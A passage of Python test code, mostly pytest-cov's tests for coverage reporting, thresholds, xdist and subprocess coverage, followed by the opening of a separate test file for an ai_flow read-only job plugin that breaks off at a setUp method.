testdir.tmpdir.join('.coveragerc').write(prop.fullconf)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script,
*prop.args)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_central* %s *' % prop.result,
'*10 passed*'
])
assert result.ret == 0
def test_annotate(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=annotate',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'Coverage annotated source written next to source',
'*10 passed*',
])
assert result.ret == 0
def test_annotate_output_dir(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=annotate:' + DEST_DIR,
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'Coverage annotated source written to dir ' + DEST_DIR,
'*10 passed*',
])
dest_dir = testdir.tmpdir.join(DEST_DIR)
assert dest_dir.check(dir=True)
assert dest_dir.join(script.basename + ",cover").check()
assert result.ret == 0
def test_html_output_dir(testdir, prop):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=html:' + DEST_DIR,
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'Coverage HTML written to dir ' + DEST_DIR,
'*10 passed*',
])
dest_dir = testdir.tmpdir.join(DEST_DIR)
assert dest_dir.check(dir=True)
assert dest_dir.join("index.html").check()
assert result.ret == 0
def test_xml_output_dir(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=xml:' + REPORT_NAME,
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'Coverage XML written to file ' + REPORT_NAME,
'*10 passed*',
])
assert testdir.tmpdir.join(REPORT_NAME).check()
assert result.ret == 0
def test_term_output_dir(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term:' + DEST_DIR,
script)
result.stderr.fnmatch_lines([
'*argument --cov-report: output specifier not supported for: "term:%s"*' % DEST_DIR,
])
assert result.ret != 0
def test_term_missing_output_dir(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing:' + DEST_DIR,
script)
result.stderr.fnmatch_lines([
'*argument --cov-report: output specifier not supported for: '
'"term-missing:%s"*' % DEST_DIR,
])
assert result.ret != 0
def test_cov_min_100(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'--cov-fail-under=100',
script)
assert result.ret != 0
result.stdout.fnmatch_lines([
'FAIL Required test coverage of 100% not reached. Total coverage: *%'
])
def test_cov_min_50(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'--cov-fail-under=50',
script)
assert result.ret == 0
result.stdout.fnmatch_lines([
'Required test coverage of 50% reached. Total coverage: *%'
])
def test_cov_min_no_report(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=',
'--cov-fail-under=50',
script)
assert result.ret == 0
result.stdout.fnmatch_lines([
'Required test coverage of 50% reached. Total coverage: *%'
])
def test_central_nonspecific(testdir, prop):
script = testdir.makepyfile(prop.code)
testdir.tmpdir.join('.coveragerc').write(prop.fullconf)
result = testdir.runpytest('-v',
'--cov',
'--cov-report=term-missing',
script, *prop.args)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_central_nonspecific* %s *' % prop.result,
'*10 passed*'
])
# multi-module coverage report
assert any(line.startswith('TOTAL ') for line in result.stdout.lines)
assert result.ret == 0
@pytest.mark.skipif('StrictVersion(coverage.__version__) <= StrictVersion("3.8")')
def test_cov_min_from_coveragerc(testdir):
script = testdir.makepyfile(SCRIPT)
testdir.tmpdir.join('.coveragerc').write("""
[report]
fail_under = 100
""")
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
assert result.ret != 0
def test_central_coveragerc(testdir, prop):
script = testdir.makepyfile(prop.code)
testdir.tmpdir.join('.coveragerc').write(COVERAGERC_SOURCE + prop.conf)
result = testdir.runpytest('-v',
'--cov',
'--cov-report=term-missing',
script, *prop.args)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_central_coveragerc* %s *' % prop.result,
'*10 passed*',
])
# single-module coverage report
assert all(not line.startswith('TOTAL ') for line in result.stdout.lines[-4:])
assert result.ret == 0
@xdist
def test_central_with_path_aliasing(testdir, monkeypatch, opts, prop):
mod1 = testdir.mkdir('src').join('mod.py')
mod1.write(SCRIPT)
mod2 = testdir.mkdir('aliased').join('mod.py')
mod2.write(SCRIPT)
script = testdir.makepyfile('''
from mod import *
''')
testdir.tmpdir.join('setup.cfg').write("""
[coverage:paths]
source =
src
aliased
[coverage:run]
source = mod
parallel = true
%s
""" % prop.conf)
monkeypatch.setitem(os.environ, 'PYTHONPATH', os.pathsep.join([os.environ.get('PYTHONPATH', ''), 'aliased']))
result = testdir.runpytest('-v', '-s',
'--cov',
'--cov-report=term-missing',
script, *opts.split()+prop.args)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'src[\\/]mod* %s *' % prop.result,
'*10 passed*',
])
# single-module coverage report
assert all(not line.startswith('TOTAL ') for line in result.stdout.lines[-4:])
assert result.ret == 0
def test_subprocess_with_path_aliasing(testdir, monkeypatch):
src = testdir.mkdir('src')
src.join('parent_script.py').write(SCRIPT_PARENT)
src.join('child_script.py').write(SCRIPT_CHILD)
aliased = testdir.mkdir('aliased')
parent_script = aliased.join('parent_script.py')
parent_script.write(SCRIPT_PARENT)
aliased.join('child_script.py').write(SCRIPT_CHILD)
testdir.tmpdir.join('.coveragerc').write("""
[paths]
source =
src
aliased
[run]
source =
parent_script
child_script
parallel = true
""")
monkeypatch.setitem(os.environ, 'PYTHONPATH', os.pathsep.join([os.environ.get('PYTHONPATH',''), 'aliased']))
result = testdir.runpytest('-v',
'--cov',
'--cov-report=term-missing',
parent_script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'src[\\/]child_script* %s*' % CHILD_SCRIPT_RESULT,
'src[\\/]parent_script* %s*' % PARENT_SCRIPT_RESULT,
])
assert result.ret == 0
def test_show_missing_coveragerc(testdir, prop):
script = testdir.makepyfile(prop.code)
testdir.tmpdir.join('.coveragerc').write("""
[run]
source = .
%s
[report]
show_missing = true
""" % prop.conf)
result = testdir.runpytest('-v',
'--cov',
'--cov-report=term',
script, *prop.args)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'Name * Stmts * Miss * Cover * Missing',
'test_show_missing_coveragerc* %s * 11*' % prop.result,
'*10 passed*',
])
# single-module coverage report
assert all(not line.startswith('TOTAL ') for line in result.stdout.lines[-4:])
assert result.ret == 0
def test_no_cov_on_fail(testdir):
script = testdir.makepyfile(SCRIPT_FAIL)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'--no-cov-on-fail',
script)
assert 'coverage: platform' not in result.stdout.str()
result.stdout.fnmatch_lines(['*1 failed*'])
def test_no_cov(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-vvv',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'--no-cov',
'-rw',
script)
result.stdout.fnmatch_lines_random([
'WARNING: Coverage disabled via --no-cov switch!',
'*Coverage disabled via --no-cov switch!',
])
def test_cov_and_failure_report_on_fail(testdir):
script = testdir.makepyfile(SCRIPT + SCRIPT_FAIL)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-fail-under=100',
script)
result.stdout.fnmatch_lines_random([
'*10 failed*',
'*coverage: platform*',
'*FAIL Required test coverage of 100% not reached*',
'*assert False*',
])
def test_dist_combine_racecondition(testdir):
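# Generate a module with 1000 parametrized test cases to stress concurrent
# combining of coverage data files under xdist.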
script = testdir.makepyfile("""
import pytest
@pytest.mark.parametrize("foo", range(1000))
def test_foo(foo):
""" + "\n".join("""
if foo == %s:
assert True
""" % i for i in range(1000)))
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'-n', '5', '-s',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_dist_combine_racecondition* 2002 * 0 * 100%*',
'*1000 passed*'
])
for line in chain(result.stdout.lines, result.stderr.lines):
assert 'The following slaves failed to return coverage data' not in line
assert 'INTERNALERROR' not in line
assert result.ret == 0
def test_dist_collocated(testdir, prop):
script = testdir.makepyfile(prop.code)
testdir.tmpdir.join('.coveragerc').write(prop.fullconf)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'--dist=load',
'--tx=2*popen',
'--max-slave-restart=0',
script, *prop.args)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_dist_collocated* %s *' % prop.result,
'*10 passed*'
])
assert result.ret == 0
def test_dist_not_collocated(testdir, prop):
script = testdir.makepyfile(prop.code)
dir1 = testdir.mkdir('dir1')
dir2 = testdir.mkdir('dir2')
testdir.tmpdir.join('.coveragerc').write('''
[run]
%s
[paths]
source =
.
dir1
dir2''' % prop.conf)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'--dist=load',
'--tx=popen//chdir=%s' % dir1,
'--tx=popen//chdir=%s' % dir2,
'--rsyncdir=%s' % script.basename,
'--rsyncdir=.coveragerc',
'--max-slave-restart=0', '-s',
script, *prop.args)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_dist_not_collocated* %s *' % prop.result,
'*10 passed*'
])
assert result.ret == 0
def test_central_subprocess(testdir):
scripts = testdir.makepyfile(parent_script=SCRIPT_PARENT,
child_script=SCRIPT_CHILD)
parent_script = scripts.dirpath().join('parent_script.py')
result = testdir.runpytest('-v',
'--cov=%s' % scripts.dirpath(),
'--cov-report=term-missing',
parent_script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'child_script* %s*' % CHILD_SCRIPT_RESULT,
'parent_script* %s*' % PARENT_SCRIPT_RESULT,
])
assert result.ret == 0
def test_central_subprocess_change_cwd(testdir):
scripts = testdir.makepyfile(parent_script=SCRIPT_PARENT_CHANGE_CWD,
child_script=SCRIPT_CHILD)
parent_script = scripts.dirpath().join('parent_script.py')
testdir.makefile('', coveragerc="""
[run]
branch = true
parallel = true
""")
result = testdir.runpytest('-v', '-s',
'--cov=%s' % scripts.dirpath(),
'--cov-config=coveragerc',
'--cov-report=term-missing',
parent_script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'*child_script* %s*' % CHILD_SCRIPT_RESULT,
'*parent_script* 100%*',
])
assert result.ret == 0
def test_central_subprocess_change_cwd_with_pythonpath(testdir, monkeypatch):
stuff = testdir.mkdir('stuff')
parent_script = stuff.join('parent_script.py')
parent_script.write(SCRIPT_PARENT_CHANGE_CWD_IMPORT_CHILD)
stuff.join('child_script.py').write(SCRIPT_CHILD)
testdir.makefile('', coveragerc="""
[run]
parallel = true
""")
monkeypatch.setitem(os.environ, 'PYTHONPATH', str(stuff))
result = testdir.runpytest('-vv', '-s',
'--cov=child_script',
'--cov-config=coveragerc',
'--cov-report=term-missing',
'--cov-branch',
parent_script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'*child_script* %s*' % CHILD_SCRIPT_RESULT,
])
assert result.ret == 0
def test_central_subprocess_no_subscript(testdir):
script = testdir.makepyfile("""
import subprocess, sys
def test_foo():
subprocess.check_call([sys.executable, '-c', 'print("Hello World")'])
""")
testdir.makefile('', coveragerc="""
[run]
parallel = true
omit =
*/__init__.py
""")
result = testdir.runpytest('-v',
'--cov-config=coveragerc',
'--cov=%s' % script.dirpath(),
'--cov-branch',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_central_subprocess_no_subscript* * 3 * 0 * 100%*',
])
assert result.ret == 0
def test_dist_subprocess_collocated(testdir):
scripts = testdir.makepyfile(parent_script=SCRIPT_PARENT,
child_script=SCRIPT_CHILD)
parent_script = scripts.dirpath().join('parent_script.py')
result = testdir.runpytest('-v',
'--cov=%s' % scripts.dirpath(),
'--cov-report=term-missing',
'--dist=load',
'--tx=2*popen',
'--max-slave-restart=0',
parent_script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'child_script* %s*' % CHILD_SCRIPT_RESULT,
'parent_script* %s*' % PARENT_SCRIPT_RESULT,
])
assert result.ret == 0
def test_dist_subprocess_not_collocated(testdir, tmpdir):
scripts = testdir.makepyfile(parent_script=SCRIPT_PARENT,
child_script=SCRIPT_CHILD)
parent_script = scripts.dirpath().join('parent_script.py')
child_script = scripts.dirpath().join('child_script.py')
dir1 = tmpdir.mkdir('dir1')
dir2 = tmpdir.mkdir('dir2')
testdir.tmpdir.join('.coveragerc').write('''
[paths]
source =
%s
*/dir1
*/dir2
''' % scripts.dirpath())
result = testdir.runpytest('-v',
'--cov=%s' % scripts.dirpath(),
'--dist=load',
'--tx=popen//chdir=%s' % dir1,
'--tx=popen//chdir=%s' % dir2,
'--rsyncdir=%s' % child_script,
'--rsyncdir=%s' % parent_script,
'--rsyncdir=.coveragerc',
'--max-slave-restart=0',
parent_script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'child_script* %s*' % CHILD_SCRIPT_RESULT,
'parent_script* %s*' % PARENT_SCRIPT_RESULT,
])
assert result.ret == 0
def test_invalid_coverage_source(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=non_existent_module',
'--cov-report=term-missing',
script)
result.stdout.fnmatch_lines([
'*10 passed*'
])
result.stderr.fnmatch_lines([
'Coverage.py warning: No data was collected.*'
])
result.stdout.fnmatch_lines([
'*Failed to generate report: No data to report.',
])
assert result.ret == 0
matching_lines = [line for line in result.outlines if '%' in line]
assert not matching_lines
@pytest.mark.skipif("'dev' in pytest.__version__")
def test_dist_missing_data(testdir):
venv_path = os.path.join(str(testdir.tmpdir), 'venv')
virtualenv.create_environment(venv_path)
if sys.platform == 'win32':
exe = os.path.join(venv_path, 'Scripts', 'python.exe')
else:
exe = os.path.join(venv_path, 'bin', 'python')
subprocess.check_call([
exe,
'-mpip',
'install',
'py==%s' % py.__version__,
'pytest==%s' % pytest.__version__
])
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'--dist=load',
'--tx=popen//python=%s' % exe,
'--max-slave-restart=0',
script)
result.stdout.fnmatch_lines([
'*- coverage: failed slaves -*'
])
assert result.ret == 0
def test_funcarg(testdir):
script = testdir.makepyfile(SCRIPT_FUNCARG)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_funcarg* 3 * 100%*',
'*1 passed*'
])
assert result.ret == 0
def test_funcarg_not_active(testdir):
script = testdir.makepyfile(SCRIPT_FUNCARG_NOT_ACTIVE)
result = testdir.runpytest('-v',
script)
result.stdout.fnmatch_lines([
'*1 passed*'
])
assert result.ret == 0
def test_multiprocessing_subprocess(testdir):
py.test.importorskip('multiprocessing.util')
script = testdir.makepyfile('''
import multiprocessing
def target_fn():
a = True
return a
def test_run_target():
p = multiprocessing.Process(target=target_fn)
p.start()
p.join()
''')
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_multiprocessing_subprocess* 8 * 100%*',
'*1 passed*'
])
assert result.ret == 0
def test_multiprocessing_subprocess_no_source(testdir):
py.test.importorskip('multiprocessing.util')
script = testdir.makepyfile('''
import multiprocessing
def target_fn():
a = True
return a
def test_run_target():
p = multiprocessing.Process(target=target_fn)
p.start()
p.join()
''')
result = testdir.runpytest('-v',
'--cov',
'--cov-report=term-missing',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_multiprocessing_subprocess* 8 * 100%*',
'*1 passed*'
])
assert result.ret == 0
@pytest.mark.skipif('sys.platform == "win32"',
reason="multiprocessing don't support clean process temination on Windows")
def test_multiprocessing_subprocess_with_terminate(testdir):
py.test.importorskip('multiprocessing.util')
script = testdir.makepyfile('''
import multiprocessing
import time
from pytest_cov.embed import cleanup_on_sigterm
cleanup_on_sigterm()
event = multiprocessing.Event()
def target_fn():
a = True
event.set()
time.sleep(5)
def test_run_target():
p = multiprocessing.Process(target=target_fn)
p.start()
event.wait(1)
p.terminate()
p.join()
''')
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_multiprocessing_subprocess* 15 * 100%*',
'*1 passed*'
])
assert result.ret == 0
MODULE = '''
def func():
return 1
'''
CONFTEST = '''
import mod
mod.func()
'''
BASIC_TEST = '''
def test_basic():
x = True
assert x
'''
CONF_RESULT = 'mod* 2 * 100%*'
def test_cover_conftest(testdir):
testdir.makepyfile(mod=MODULE)
testdir.makeconftest(CONFTEST)
script = testdir.makepyfile(BASIC_TEST)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
assert result.ret == 0
result.stdout.fnmatch_lines([CONF_RESULT])
def test_cover_looponfail(testdir, monkeypatch):
testdir.makepyfile(mod=MODULE)
testdir.makeconftest(CONFTEST)
script = testdir.makepyfile(BASIC_TEST)
monkeypatch.setattr(testdir, 'run', lambda *args: _TestProcess(*map(str, args)))
with testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--looponfail',
script) as process:
with dump_on_error(process.read):
wait_for_strings(
process.read,
30, # 30 seconds
'Stmts Miss Cover'
)
def test_cover_conftest_dist(testdir):
testdir.makepyfile(mod=MODULE)
testdir.makeconftest(CONFTEST)
script = testdir.makepyfile(BASIC_TEST)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'--dist=load',
'--tx=2*popen',
'--max-slave-restart=0',
script)
assert result.ret == 0
result.stdout.fnmatch_lines([CONF_RESULT])
def test_no_cover_marker(testdir):
testdir.makepyfile(mod=MODULE)
script = testdir.makepyfile('''
import pytest
import mod
import subprocess
import sys
@pytest.mark.no_cover
def test_basic():
mod.func()
subprocess.check_call([sys.executable, '-c', 'from mod import func; func()'])
''')
result = testdir.runpytest('-v', '-ra', '--strict',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
assert result.ret == 0
result.stdout.fnmatch_lines(['mod* 2 * 1 * 50% * 2'])
def test_no_cover_fixture(testdir):
testdir.makepyfile(mod=MODULE)
script = testdir.makepyfile('''
import mod
import subprocess
import sys
def test_basic(no_cover):
mod.func()
subprocess.check_call([sys.executable, '-c', 'from mod import func; func()'])
''')
result = testdir.runpytest('-v', '-ra', '--strict',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
assert result.ret == 0
result.stdout.fnmatch_lines(['mod* 2 * 1 * 50% * 2'])
COVERAGERC = '''
[report]
# Regexes for lines to exclude from consideration
exclude_lines =
raise NotImplementedError
'''
EXCLUDED_TEST = '''
def func():
raise NotImplementedError
def test_basic():
x = True
assert x
'''
EXCLUDED_RESULT = '4 * 100%*'
def test_coveragerc(testdir):
testdir.makefile('', coveragerc=COVERAGERC)
script = testdir.makepyfile(EXCLUDED_TEST)
result = testdir.runpytest('-v',
'--cov-config=coveragerc',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
assert result.ret == 0
result.stdout.fnmatch_lines(['test_coveragerc* %s' % EXCLUDED_RESULT])
def test_coveragerc_dist(testdir):
testdir.makefile('', coveragerc=COVERAGERC)
script = testdir.makepyfile(EXCLUDED_TEST)
result = testdir.runpytest('-v',
'--cov-config=coveragerc',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
'-n', '2',
'--max-slave-restart=0',
script)
assert result.ret == 0
result.stdout.fnmatch_lines(
['test_coveragerc_dist* %s' % EXCLUDED_RESULT])
SKIP_COVERED_COVERAGERC = '''
[report]
skip_covered = True
'''
SKIP_COVERED_TEST = '''
def func():
return "full coverage"
def test_basic():
assert func() == "full coverage"
'''
SKIP_COVERED_RESULT = '1 file skipped due to complete coverage.'
@pytest.mark.skipif('StrictVersion(coverage.__version__) < StrictVersion("4.0")')
@pytest.mark.parametrize('report_option', [
'term-missing:skip-covered',
'term:skip-covered'])
def test_skip_covered_cli(testdir, report_option):
testdir.makefile('', coveragerc=SKIP_COVERED_COVERAGERC)
script = testdir.makepyfile(SKIP_COVERED_TEST)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=%s' % report_option,
script)
assert result.ret == 0
result.stdout.fnmatch_lines([SKIP_COVERED_RESULT])
@pytest.mark.skipif('StrictVersion(coverage.__version__) < StrictVersion("4.0")')
def test_skip_covered_coveragerc_config(testdir):
testdir.makefile('', coveragerc=SKIP_COVERED_COVERAGERC)
script = testdir.makepyfile(SKIP_COVERED_TEST)
result = testdir.runpytest('-v',
'--cov-config=coveragerc',
'--cov=%s' % script.dirpath(),
script)
assert result.ret == 0
result.stdout.fnmatch_lines([SKIP_COVERED_RESULT])
CLEAR_ENVIRON_TEST = '''
import os
def test_basic():
os.environ.clear()
'''
def test_clear_environ(testdir):
script = testdir.makepyfile(CLEAR_ENVIRON_TEST)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=term-missing',
script)
assert result.ret == 0
SCRIPT_SIMPLE = '''
def test_foo():
assert 1 == 1
x = True
assert x
'''
SCRIPT_SIMPLE_RESULT = '4 * 100%'
@pytest.mark.skipif('sys.platform == "win32"')
def test_dist_boxed(testdir):
script = testdir.makepyfile(SCRIPT_SIMPLE)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--boxed',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_dist_boxed* %s*' % SCRIPT_SIMPLE_RESULT,
'*1 passed*'
])
assert result.ret == 0
@pytest.mark.skipif('sys.platform == "win32"')
def test_dist_bare_cov(testdir):
script = testdir.makepyfile(SCRIPT_SIMPLE)
result = testdir.runpytest('-v',
'--cov',
'-n', '1',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_dist_bare_cov* %s*' % SCRIPT_SIMPLE_RESULT,
'*1 passed*'
])
assert result.ret == 0
def test_not_started_plugin_does_not_fail(testdir):
class ns:
cov_source = [True]
cov_report = ''
plugin = pytest_cov.plugin.CovPlugin(ns, None, start=False)
plugin.pytest_runtestloop(None)
plugin.pytest_terminal_summary(None)
def test_default_output_setting(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
script)
result.stdout.fnmatch_lines([
'*coverage*'
])
assert result.ret == 0
def test_disabled_output(testdir):
script = testdir.makepyfile(SCRIPT)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'--cov-report=',
script)
assert 'coverage' not in result.stdout.str()
assert result.ret == 0
def test_coverage_file(testdir):
script = testdir.makepyfile(SCRIPT)
data_file_name = 'covdata'
os.environ['COVERAGE_FILE'] = data_file_name
try:
result = testdir.runpytest('-v', '--cov=%s' % script.dirpath(),
script)
assert result.ret == 0
data_file = testdir.tmpdir.join(data_file_name)
assert data_file.check()
finally:
os.environ.pop('COVERAGE_FILE')
def test_external_data_file(testdir):
script = testdir.makepyfile(SCRIPT)
testdir.tmpdir.join('.coveragerc').write("""
[run]
data_file = %s
""" % testdir.tmpdir.join('some/special/place/coverage-data').ensure())
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
script)
assert result.ret == 0
assert glob.glob(str(testdir.tmpdir.join('some/special/place/coverage-data*')))
def test_external_data_file_xdist(testdir):
script = testdir.makepyfile(SCRIPT)
testdir.tmpdir.join('.coveragerc').write("""
[run]
parallel = true
data_file = %s
""" % testdir.tmpdir.join('some/special/place/coverage-data').ensure())
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
'-n', '1',
'--max-slave-restart=0',
script)
assert result.ret == 0
assert glob.glob(str(testdir.tmpdir.join('some/special/place/coverage-data*')))
def test_external_data_file_negative(testdir):
script = testdir.makepyfile(SCRIPT)
testdir.tmpdir.join('.coveragerc').write("")
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
script)
assert result.ret == 0
assert glob.glob(str(testdir.tmpdir.join('.coverage*')))
@xdist
def xtest_append_coverage(testdir, opts, prop):
script = testdir.makepyfile(test_1=prop.code)
testdir.tmpdir.join('.coveragerc').write(prop.fullconf)
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
script,
*opts.split()+prop.args)
result.stdout.fnmatch_lines([
'test_1* %s*' % prop.result,
])
script2 = testdir.makepyfile(test_2=prop.code2)
result = testdir.runpytest('-v',
'--cov-append',
'--cov=%s' % script2.dirpath(),
script2,
*opts.split()+prop.args)
result.stdout.fnmatch_lines([
'test_1* %s*' % prop.result,
'test_2* %s*' % prop.result2,
])
@xdist
def xtest_do_not_append_coverage(testdir, opts, prop):
script = testdir.makepyfile(test_1=prop.code)
testdir.tmpdir.join('.coveragerc').write("")
result = testdir.runpytest('-v',
'--cov=%s' % script.dirpath(),
script,
*opts.split()+prop.args)
result.stdout.fnmatch_lines([
'test_1* %s*' % prop.result,
])
script2 = testdir.makepyfile(test_2=prop.code2)
result = testdir.runpytest('-v',
'--cov=%s' % script2.dirpath(),
script2,
*opts.split()+prop.args)
result.stdout.fnmatch_lines([
'test_1* 0%',
'test_2* %s*' % prop.result2,
])
def test_pth_failure(monkeypatch):
with open('src/pytest-cov.pth') as fh:
payload = fh.read()
class SpecificError(Exception):
pass
def bad_init():
raise SpecificError()
buff = StringIO()
from pytest_cov import embed
monkeypatch.setattr(embed, 'init', bad_init)
monkeypatch.setattr(sys, 'stderr', buff)
monkeypatch.setitem(os.environ, 'COV_CORE_SOURCE', 'foobar')
exec_(payload)
assert buff.getvalue() == '''pytest-cov: Failed to setup subprocess coverage. Environ: {'COV_CORE_SOURCE': 'foobar'} Exception: SpecificError()
'''
def test_double_cov(testdir):
script = testdir.makepyfile(SCRIPT_SIMPLE)
result = testdir.runpytest('-v',
'--cov', '--cov=%s' % script.dirpath(),
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_double_cov* %s*' % SCRIPT_SIMPLE_RESULT,
'*1 passed*'
])
assert result.ret == 0
def test_double_cov2(testdir):
script = testdir.makepyfile(SCRIPT_SIMPLE)
result = testdir.runpytest('-v',
'--cov', '--cov',
script)
result.stdout.fnmatch_lines([
'*- coverage: platform *, python * -*',
'test_double_cov2* %s*' % SCRIPT_SIMPLE_RESULT,
'*1 passed*'
])
assert result.ret == 0
|
test_read_only_job_plugin.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import time
import unittest
from threading import Thread
from unittest import mock
from ai_flow.workflow.job import Job
from ai_flow.workflow.status import Status
from ai_flow import DatasetMeta
from ai_flow.ai_graph.ai_node import AINode, ReadDatasetNode, WriteDatasetNode
from ai_flow.workflow.job_config import JobConfig
from ai_flow.ai_graph.ai_graph import AISubGraph
from ai_flow_plugins.job_plugins.bash import BashProcessor
from ai_flow_plugins.job_plugins.read_only import ReadOnlyProcessor, ReadOnlyJobGenerator, ReadOnlyJob, \
ReadOnlyJobController, ReadOnlyJobHandle
class TestReadOnlyJobGenerator(unittest.TestCase):
def test_generate_throw_unknown_type_exception(self):
sub_graph = AISubGraph(JobConfig())
ai_node = AINode(processor=BashProcessor('hello'))
sub_graph.add_node(ai_node)
sub_graph.add_node(AINode(processor=ReadOnlyProcessor()))
job_generator = ReadOnlyJobGenerator()
with self.assertRaises(TypeError):
job_generator.generate(sub_graph)
def test_generate(self):
sub_graph = AISubGraph(JobConfig())
sub_graph.add_node(ReadDatasetNode(dataset=DatasetMeta("test"), processor=ReadOnlyProcessor()))
sub_graph.add_node(AINode(processor=ReadOnlyProcessor()))
sub_graph.add_node(WriteDatasetNode(dataset=DatasetMeta("test"), processor=ReadOnlyProcessor()))
job_generator = ReadOnlyJobGenerator()
job = job_generator.generate(sub_graph)
self.assertIsInstance(job, ReadOnlyJob)
def test_generate_with_required_configs(self):
job_config = JobConfig()
sub_graph = AISubGraph(job_config)
sub_graph.add_node(ReadDatasetNode(dataset=DatasetMeta("test"), processor=ReadOnlyProcessor()))
sub_graph.add_node(AINode(processor=ReadOnlyProcessor()))
sub_graph.add_node(WriteDatasetNode(dataset=DatasetMeta("test"), processor=ReadOnlyProcessor()))
job_generator = ReadOnlyJobGenerator(required_properties={'required_key'})
with self.assertRaises(RuntimeError):
job_generator.generate(sub_graph)
job_config.properties['required_key'] = 'value'
job = job_generator.generate(sub_graph)
self.assertIsInstance(job, ReadOnlyJob)
class TestReadOnlyJobController(unittest.TestCase):
def setUp(self) -> None:
